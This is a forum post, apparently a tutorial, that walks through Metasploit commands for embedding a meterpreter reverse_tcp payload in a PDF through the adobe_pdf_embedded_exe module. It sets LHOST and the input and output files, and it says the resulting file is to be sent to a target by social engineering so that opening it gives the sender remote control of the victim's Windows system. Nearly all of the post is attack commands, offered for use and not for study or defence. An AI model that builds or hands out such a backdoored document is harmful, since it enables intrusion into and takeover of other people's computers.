02-18-2025, 02:52 AM
|
Join Date: Dec 2022
Posts: 0
|
Open your kali terminal and type msfconsole to start Metasploit.
search type:exploit platform:windows adobe pdf
We’ll create a backdoor for Adobe reader. Adobe reader exploits can affect Windows. The above code will list all the exploits that met our criteria. Let’s use the “exploit/windows/fileformat/adobe_pdf_embedded_exe”.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Once you choose the exploit. Let’s look into the information of this exploit.
exploit (adobe_pdf_embedded_exe) > info
If you read the description, it’s written that it embeds a Metasploit payload into an existing PDF file. This means you can send this PDF as part of social engineering attacks.
Now, we need to set our payload to add to the pdf.
exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
The only thing left is to set options. Let’s take a look at the options first:
exploit (adobe_pdf_embedded_exe) > show options
You would see it will ask for pdf where it can embed. Say, your file name is application.pdf (it should have been created in Reader 9). Let us add it:
exploit (adobe_pdf_embedded_exe) > set INFILENAME application.pdf
Also, set up the output file. If you won’t set any name then it will name evil.pdf itself.
exploit (adobe_pdf_embedded_exe) > set FILENAME application.pdf
Add LHOST as your IP address.
exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.100.1
Run the first command which we used in this step to confirm the settings we just made above.
It’s time to get with the exploit we just made. Finally, create the exploit:
msf > exploit (adobe_pdf_embedded_exe) > exploit
Your exploit will be located at /root/.msf4/local/appication.pdf. On sending this file to the target user if they download it, it will open a connection to the IP you provided as LHOST and you can run and own their system.
Customize it at your own preferences.
|
|
Linear Mode
